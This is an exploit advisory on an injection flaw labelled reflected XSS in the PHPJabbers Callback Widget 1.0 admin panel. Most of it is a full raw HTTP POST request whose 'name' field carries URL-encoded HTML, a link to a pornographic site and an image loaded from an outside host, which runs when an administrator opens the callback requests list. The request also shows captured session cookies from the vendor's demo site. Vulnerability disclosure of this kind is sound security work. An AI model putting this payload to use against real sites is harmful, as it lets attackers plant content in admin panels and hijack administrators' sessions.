## Title: PHPJ-Callback-Widget-1.0-XSS-Reflected-admin-Hijacking
## Author: nu11secur1ty
## Date: 01/26/2024
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/callback-widget/
## Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
The Callback Requests function is vulnerable to javascript injection.
The malicious user from everywhere can send an XSS-Reflected exploit code to the admin panel, and then when the admin visits the API Callback Requests function he will immediately activate the exploitation of the malicious actor. This is so fun, thanks for watching the PoC video. =) BR
STATUS: HIGH-Vulnerability
[+]Exploit:
```POST
POST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1
Host: demo.phpjabbers.com
Cookie: _ga=GA1.2.2069938240.1692907228; _fbp=fb.1.1705479327501.84379277; _ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0; CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84
Content-Length: 322
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.phpjabbers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close
reason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html)
## Time spent:
00:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>